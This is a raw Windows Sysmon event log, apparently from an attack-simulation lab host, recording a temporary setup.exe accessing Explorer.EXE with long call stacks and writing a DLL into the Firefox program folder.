13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-timezone-l1-1-0.dll2021-01-18 13:59:52.130 10341000x800000000000000014247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
